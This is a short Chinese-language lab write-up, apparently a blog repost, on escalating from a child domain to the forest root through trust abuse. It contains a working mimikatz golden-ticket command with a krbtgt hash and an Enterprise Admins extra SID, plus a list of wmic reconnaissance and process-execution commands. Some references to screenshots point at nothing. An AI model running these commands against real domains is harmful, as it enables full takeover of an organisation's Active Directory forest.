子父域控双向信任

------------恢复内容开始------------

假设有一个域zhong.czf

Dc.zhong.czf是该域域控
pp.zhong.czf是该域的子域(和DC构造成域树)(域控是pp.pp.zhong.czf)
ppo.pp.zhong.czf是pp下面的子域(和pp构造成域林)

 在这里现有域下面进行域林搭建的时候一定选择

构成这样的域

思路

得到域内ppo权限 上面刚好被域控pp登陆过

 此时我们是能访问根域控win的 但是肯定是没权限ipc的

 当我天真的以为成功了的时候

kerberos::golden /user:Administrator /domain:pp.zhong.czf /sid:S-1-5-21-3321026355-1170224481-604632441 /krbtgt:758c84a842111552468551c16662885f /sids:S-1-5-21-3267649711-2093864886-1768988539-519 /ptt

出现了这种情况

 原因是第二个sid 企业管理员的sid加入的时候加入错了

正确的时候这里应该出现一个extra Sid

这里需要解释的是 
ppo做为pp域内的域成员
需要的是
pp.zhong.czf domain admin 的SID 和krbtgt账户
第二个sid是
zhong.czf域的 extr admin SID-519
第二个是sids
获取
wmic家族
wmic bios                                                     ----- 查看bios信息
wmic qfe                                                      ----- 查看补丁信息
wmic qfe get hotfixid                                     ----- 查看补丁-Patch号
wmic startup                                                 ----- 查看启动项
wmic service                                                 ----- 查看服务
wmic os                                                       ----- 查看OS信息
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size,
volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
 

正确的样子

文献参考
writeup http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/
原文地址:https://www.cnblogs.com/-zhong/p/12272974.html